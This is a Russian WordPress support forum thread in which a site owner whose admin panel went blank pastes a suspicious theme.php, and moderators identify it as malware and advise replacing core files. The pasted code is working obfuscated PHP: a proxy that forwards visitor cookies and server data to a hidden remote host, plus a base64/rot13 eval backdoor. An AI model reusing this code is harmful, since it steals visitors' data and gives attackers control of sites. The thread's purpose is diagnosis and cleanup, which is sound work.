• Привет. Пожалуйста помогите.
    Пропала админка. Просто белый экран вместо нее.
    При этом сам сайт работает нормально.
    Сам сайт http://efremov-pk.ru/wp-admin/
    Сейчас через хостинг включил в wp-config.php режим дебага.

    В чем может быть проблема ребят!

Просмотр 12 ответов — с 16 по 27 (всего 27)
  • Вот содержание theme.php

    <?php $h=&$_COOKIE;$Z=&$_SERVER;$s=ltrim($Z["\122\x45\x51\x55\105\x53\x54\137\x55\x52\111"],'/');$z=0;if(preg_match('~^(.*)-([^-]{1,2}?)(\.|\z|/)~',$s,$Q)){$k=245;for($C=0;$C<strlen($Q[1]);$C++)$k+=ord($Q[1][$C]);if(($k&255)==hexdec($Q[2]))$z=1;}elseif(strpos($s,'zozewdbem')===0)$z=1;elseif(strpos($s,"\x6a\x73\x2fyugqayemr\56\x6a\163")===0)$z=1;elseif(strpos($s,"\152\x73\x2flitaxcolux\56\x6a\163")===0)$z=1;if($z){$g='';if(!empty($h)){foreach($h as $E=>$K){if($g)$g.='; ';$g.=$E.'='.addslashes($K);}}$a="\143\x75\x72\x6c\137\151\156\151\x74";$e=http_build_query($Z);$O="\163\x69\142\155\141\x73\150\x72\145\x6d\157\156\x74\56\x72\165";$b="\57\160\162\157\x78\171\x66\x6f\x6c\x64\x65\x72\x2f\x6a\x6f\155\x6d\156\x61\x6a\145\x71\x61\x71\141";if(is_callable($a)){$R="\143\x75\162\154\x5f\x73\x65\x74\157\160\164";$n="\143\x75\162\x6c\x5f\x65\170\x65\x63";$U=$a();$R($U,4995+5007,"\150\x74\164\160\x3a\x2f\x2f".$O.$b);$R($U,2689+7326,$e);$R($U,11316+8597,1);$R($U,9470+10609,'iDSp');if($g)$R($U,6061+3961,$g);$W=$n($U);}else{$L="\146\x73\x6f\x63\153\157\160\x65\x6e";$o="\x66\143\154\x6f\163\x65";$V="\x66\167\162\x69\164\x65";$F="\x66\x67\145\x74\163";$r=$L($O,55+25) or die();$I="\120\117\123\124 $b \110\124\x54\120/1.1\r\n\110\157\163\x74: $O\r\n\x43\157\x6e\x74\x65\x6e\x74\55\124\x79\160\x65: \141\x70\160\154\x69\x63\141\x74\x69\157\156\57\170\x2d\167\x77\167\x2d\x66\157\162\155\55\165\162\154\145\x6e\x63\157\144\145\x64\r\n";if($g)$I.="\103\x6f\157\153\151\x65: $g\r\n";$I.="\103\157\x6e\x74\145\x6e\x74\55\x6c\145\156\147\164\150: ".strlen($e)."\r\n\x43\x6f\156\x6e\145\x63\x74\151\157\x6e\x3a\40\x43\154\157\163\x65\r\n\r\n";$V($r,$I.$e);$J='';while(!feof($r)){$J.=$F($r,154+870);}$o($r);list($I,$W)=explode("\r\n\r\n",$J,2);$I=explode("\r\n",$I);$u=0;foreach($I as $B){iDSp(0,$B);if(strpos($B,"\x63\150\165\x6e\x6b\x65\144")!==false)$u=1;}if($u){for($j='';!empty($W);$W=trim($W)){$v=strpos($W,"\r\n");$f=hexdec(substr($W,0,$v));$j.=substr($W,$v+2,$f);$W=substr($W,$v+2+$f);}$W=$j;}}if(trim($W)){echo $W;exit;}}function iDSp($U,$Y){if(strpos($Y,"\x43\157\x6e\x74\x65\x6e\x74\55\124\x79\160\x65")!==false||strpos($Y,"\64\x30\x34")!==false||strpos($Y,"\63\x30\x31")!==false||strpos($Y,"\x4c\x6f\143\x61\x74\x69\x6f\x6e")!==false||strpos($Y,"\x53\x65\164\55\103\x6f\157\153\151\x65")!==false)header($Y);return strlen($Y);}?><?php @error_reporting(E_ALL);
    @ini_set("error_log",NULL);
    @ini_set("log_errors",0);
    @ini_set("display_errors", 0);
    @error_reporting(0);
    $wa = ASSERT_WARNING;
    @assert_options(ASSERT_ACTIVE, 1);
    @assert_options($wa, 0);
    @assert_options(ASSERT_QUIET_EVAL, 1);
    
    $strings = "as"; $strings .= "se";  $strings .= "rt"; $strings2 = "st"; $strings2 .= "r_r";  $strings2 .= "ot13"; $gbz = "riny(".$strings2("base64_decode");
    $light =  $strings2($gbz.'("nJLtXPScp3AyqPtxnJW2XFxtrlNtMKWlo3WspzIjo3W0nJ5aXQNcBjccMvtuMJ1jqUxbWS9QG09YFHIoVzAfnJIhqS9wnTIwnlWqXFxtrlOyL2uiVPEsD09CF0ySJlWwoTyyoaEsL2uyL2fvKGftsFOyoUAyVUfXWUIloPN9VPWbqUEjBv8iMzIlpzI0YJ1cozfhpaHiM2I0YaObpQ9cpQ0vYaIloTIhL29xMFtxK1ASHyMSHyfvHxIAG1ESK0SRESVvKFxhVvMxCFVhqKWfMJ5wo2EyXPEsH0IFIxIFJlWGEIWJEIWsGxSAEFWqYvEsH0IFIxIFJlWFEISIEIAHK1IFFFWqXF4vWaH9Vv51pzkyozAiMTHbWS9GEIWJEIWoVxuHISOsIIASHy9OE0IBIPWqXF4vWzx9ZFMbCFVhoJD1XPVjBJHjMJAuZTWyBJLmZwN5ZJH0LzDmAQN4ZQyzMQp4BQRkVvx7PzyzXTM1ozA0nJ9hK2I4nKA0pltvL3IloS9cozy0VvxcVUfXWTAbVQ0tL3IloS9cozy0XPE1pzjcBjcwqKWfK3AyqT9jqPtxL2tfVRAIHxkCHSEsFRIOERIFYPOTDHkGEFx7L3IloS9mMKEipUDbWTAbYPOQIIWZG1OHK0ACGx5SD1EHFH1SG1IHYPN1XGftL3IloS9mMKEipUDbWTAbYPOQIIWZG1OHK1EWGHICIIDfVQHcBjcwqKWfK3AyqT9jqPtxL2tfVRAIHxkCHSEsHxIHIIWBISWOGyATEIVfVSEFIHHcBjbxnJW2VQ0tL3IloS9yrTIwXPEwnPx7PzA1pzksL2kip2HbWTAbXGfXsFOyoUAynJLbnJ5cK2qyqPtvLJkfo3qsqKWfK2MipTIhVvxtCG0tZFxtrjbxnJW2VQ0tMzyfMI9aMKEsL29hqTIhqUZbWUIloPx7Pa0XnJLbnKAmMKDbWS9DG1AHJlWjVy0cVPLzVT1xAFugMQHbWS9DG1AHJlWjVy0cXFN9CFNvLwV2ZQR5ZQxlATExZwVlZ2WuZGZlL2Z4ZJLlBGt0LJDvXFO7VROyqzSfXUA0pzyjp2kup2uypltxK1OCH1EoVzZvKFxcBlO9PzIwnT8tWTyvqwfXsFO9"));'); $strings($light);
    ?>

    Если убираю этот файл при попытке открыть админку выдает следующее:

    
    Warning: include(/var/www/u0052095/data/www/efremov-pk.ru/wp-content/themes/themes.php) [function.include]: failed to open stream: No such file or directory in /var/www/u0052095/data/www/efremov-pk.ru/wp-load.php on line 1
    
    Warning: include() [function.include]: Failed opening '/var/www/u0052095/data/www/efremov-pk.ru/wp-content/themes/themes.php' for inclusion (include_path='.:') in /var/www/u0052095/data/www/efremov-pk.ru/wp-load.php on line 1
    
    Warning: Cannot modify header information - headers already sent by (output started at /var/www/u0052095/data/www/efremov-pk.ru/wp-load.php:1) in /var/www/u0052095/data/www/efremov-pk.ru/wp-includes/pluggable.php on line 1174

    Вот содержание theme.php

    Что за файл? Где лежит? Откуда взялся?

    
    <?php $h=&$_COOKIE;$Z=&$_SERVER;$s=ltrim($Z["\122\x45\x51\x55\
    

    Сильно смахивает на вирус.

    
    $light =  $strings2($gbz.'("nJLtXPScp3AyqP
    

    И такое приличные авторы в скриптах не ставят.

    Модератор Yui

    (@fierevere)

    永子

    удалите этот файл
    по ftp или через файл менеджер хостинга перепишите чистые незараженные вирусякой файлы ВП

    https://ru.wordpress.org/releases/

    папки wp-includes и wp-admin на хосте лучше удалить целиком , чтобы в них ничего лищнего не осталось.

    Ребята.
    Походу и правда вирус.
    В папке с темами были собственно темы + три php
    соответственно index.php и подозрительные headers.php и theme.php я их для начала переименовал.
    Тогда сайт начал ругаться (вывод ошибок включен) на то что в wp-load.php есть упоминание этого самого theme.php.

    Я скачал новенький чистенький wp-load.php и положил на хостинг (старый соответственно тоже переименовал). Иии.. О чудо! Все заработало!

    Хм.. Получается и правда вирус? Вообразить себе не мог, что они способны залезать на хостинг! Пароль на хостинге крепкий — работаю на хостинге я из под Linux через браузер (не по ftp правда).

    Выходит вирус залез наложил своих файлов, изменил содержимое wp-load.php и все это совершенно безнаказанно?
    Ух.. Как страшно жить..

    папки wp-includes и wp-admin на хосте лучше удалить целиком

    А это сайту не навредит если я их целиком заменю?

    Модератор Yui

    (@fierevere)

    永子

    не навредит. Архив только нужной версии WP возьмите
    в wp-includes и wp-admin лежат только файлы ядра WP, они могут и должны полностью заменяться при переустановке

    Модератор Yui

    (@fierevere)

    永子

    Получается и правда вирус

    выложенные куски кода — вне сомнений являются зловредными

    как оно попало? Обычно с темами или плагинами взятыми «слева» не из каталога
    иногда как следствие взлома из за старых необновляемых плагинов и тем
    иногда за счет дыр непосредственно хостинга, хотя это реже, т.к. приличный хостер такого себе позволять не должен

    Ладно. Попробую провести ревизию в плагинах.

    Тему мы сменить не можем — нам ее писали специально. Она очень корявая — но от нее никуда не деться. А вот плагины посмотрю.

    Всем спасибо, народ. Очень помогли.

    Модератор Yui

    (@fierevere)

    永子

    если тема старая и кривая, то взломать ее могли достаточно легко, если она действительно настолько кривая.
    единственный нюанс, если она уникальна и написана под заказ, то ломать ее можно вручную, ботнеты как правило не смогли бы найти дыру автоматически.

    в любом случае анализ взлома задача непростая.

    https://www.revisium.com/ai/
    просто поищите пока где еще могли остаться вирусы

    Этот файл — часть темы.

    Он не может быть частью темы.. частью нормальной темы, ибо находится ВНЕ ёё. Он появился позже. Или же специально заложен разработчиками темы, что маловероятно.

    Тему мы сменить не можем — нам ее писали специально. Она очень корявая — но от нее никуда не деться.

    Всё можно (тем более такое..). Да, не всё легко и быстро, но наверняка нужно.
    И точно — рано или поздно всё равно придется, ибо не только возникнут несовместимости и появится нагрузка/ошибки, но и постоянные взломы (/простои/расходы/потери) Вас утомят. И хорошо, если Вас не коснутся подобные истории.
    И чем раньше Вы примите решение на обновление всего и вся — тем меньше будет проблем с этим в будущем.

    • Ответ изменён 7 лет, 10 месяцев назад пользователем SeVlad.
    • Ответ изменён 7 лет, 10 месяцев назад пользователем SeVlad.
Просмотр 12 ответов — с 16 по 27 (всего 27)
  • Тема «Пропала админка» закрыта для новых ответов.